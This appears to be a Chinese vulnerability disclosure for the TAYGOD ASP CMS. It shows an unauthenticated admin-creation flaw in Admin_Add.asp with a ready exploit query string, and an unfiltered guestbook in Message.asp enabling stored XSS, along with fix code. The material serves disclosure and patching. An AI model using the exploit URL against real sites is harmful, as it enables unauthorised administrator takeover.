当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

TAYGOD免费企业建站系统无验证添加管理员实战及留言本XSS漏洞(含

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

①无验证添加管理员
②留言本XSS漏洞
详细说明:①无验证添加管理员
漏洞文件:Admin_Add.asp
漏洞代码:
<!--#include file="../../config/conn.asp"-->
<!--#include file="md5.asp"-->

<%
if request.QueryString("action")="save" then

uid=replace(trim(Request("uid")),"'","")
realname=replace(trim(Request("realname")),"'","")
pwd1=replace(trim(Request("pwd1")),"'","")
pwd2=replace(trim(Request("pwd2")),"'","")
password=md5(pwd1)

原因:未进行验证直接写入数据

利用方案:构造URL

?action=save&uid=test&realname=test&pwd1=123456&pwd2=123456

这样就能添加进去一个帐号为test,涛涛电脑知识网,密码为123456的管理员用户
②留言本XSS漏洞
漏洞文件:Message.asp
漏洞代码:
if request.QueryString("action")="save" then
username=trim(request("username"))
email=trim(request("email"))
tel=trim(request("tel"))
zhiwu=trim(request("zhiwu"))
city=trim(request("city"))
qq=trim(request("qq"))
add=trim(request("add"))
title=trim(request("title"))
content=trim(request("content"))
messageip=Request.ServerVariables("REMOTE_ADDR")
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from TAY_message",conn,1,3

原因:未过滤,后台照样能够执行

 

漏洞证明:



介个站点是官方演示站点,www.xuhantao.com,同样存在漏洞

修补方案:

加入判断代码
if session("admin")="" then
response.Write "<script language='javascript'>alert('网络超时或您还没有登陆!');window.location.href='login.asp';</script>"
response.End
end if

留言本添加过滤

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1